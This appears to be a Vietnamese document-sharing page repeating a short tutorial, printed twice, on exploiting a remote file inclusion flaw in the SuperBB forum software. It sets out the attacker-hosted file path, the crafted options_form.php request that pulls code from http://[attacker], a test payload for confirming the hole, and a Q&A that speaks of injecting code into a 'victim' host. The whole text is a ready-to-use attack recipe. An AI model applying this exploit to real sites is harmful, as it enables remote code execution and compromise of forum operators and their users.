Đề tài Khai thác lỗi bảo mật forum SuperBB
Khai thác lỗi bảo mật forum SuperBB :
Tạo trên host
http://[attacker]/lang/1/1_options.php
Chạy trên trình duyệt
http://[target]/include/options_form.php?script_path=http://[attacker]&lang_cod
e=1
Cách test:
1. Đăng ký một host ko support PHP.
2. Tạo trên host đó một folder named lang, trong folder lang tạo folder named 1,
trong folder 1 tạo một file tên là 1_options.php với nội dung như sau:
CODE
<? echo "Hello world"; ?>
Chạy trên trình duyệt
http://[target]/include/options_form.php?script_path=http://[attacker]&lang_cod
e=1
Nếu thấy có dòng chữ "Hello world" thì OK, site đang test bị lỗi này
Câu hỏi:
1. SupperBB vuln là gì?
2. Làm sao đăng kí host trên server đó được ( nếu họ ko cho )
3. Host ko support php thì làm sao hiển thị cái file 1_options.php được?
4. Tại sao lại phải tạo folder lang rồi tạo folder name 1 rồi tạo file 1_options.php
, mục đích là để làm gì?
5. Site đang test bị lỗi này thì mình làm được gì với lỗi đó?
Trả lời :
1. Là lỗi bảo mật của forum SuperBB
2. Không cần đăng ký host trên server đó, đăng ký host ở đâu cũng được
(nhưng ko được support PHP)
3. Được, vì cái file 1_options.php ko phải được run trên host của mình mà được
inject vào code trên host của victim
4. Bởi vì script forum nó include đến file 1_options.php ở trong cấu trúc thư mục
như thế
5. Làm được gì là tuỳ vào kinh nghiệm mỗi người
1 trang |
Chia sẻ: tlsuongmuoi | Lượt xem: 2225 | Lượt tải: 0
Bạn đang xem nội dung tài liệu Đề tài Khai thác lỗi bảo mật forum SuperBB, để tải tài liệu về máy bạn click vào nút DOWNLOAD ở trên
Khai thác lỗi bảo mật forum SuperBB :
Tạo trên host
http://[attacker]/lang/1/1_options.php
Chạy trên trình duyệt
http://[target]/include/options_form.php?script_path=http://[attacker]&lang_cod
e=1
Cách test:
1. Đăng ký một host ko support PHP.
2. Tạo trên host đó một folder named lang, trong folder lang tạo folder named 1,
trong folder 1 tạo một file tên là 1_options.php với nội dung như sau:
CODE
Chạy trên trình duyệt
http://[target]/include/options_form.php?script_path=http://[attacker]&lang_cod
e=1
Nếu thấy có dòng chữ "Hello world" thì OK, site đang test bị lỗi này
Câu hỏi:
1. SupperBB vuln là gì?
2. Làm sao đăng kí host trên server đó được ( nếu họ ko cho )
3. Host ko support php thì làm sao hiển thị cái file 1_options.php được?
4. Tại sao lại phải tạo folder lang rồi tạo folder name 1 rồi tạo file 1_options.php
, mục đích là để làm gì?
5. Site đang test bị lỗi này thì mình làm được gì với lỗi đó?
Trả lời :
1. Là lỗi bảo mật của forum SuperBB
2. Không cần đăng ký host trên server đó, đăng ký host ở đâu cũng được
(nhưng ko được support PHP)
3. Được, vì cái file 1_options.php ko phải được run trên host của mình mà được
inject vào code trên host của victim
4. Bởi vì script forum nó include đến file 1_options.php ở trong cấu trúc thư mục
như thế
5. Làm được gì là tuỳ vào kinh nghiệm mỗi người
Các file đính kèm theo tài liệu này:
- Khai thác lỗi bảo mật forum SuperBB.pdf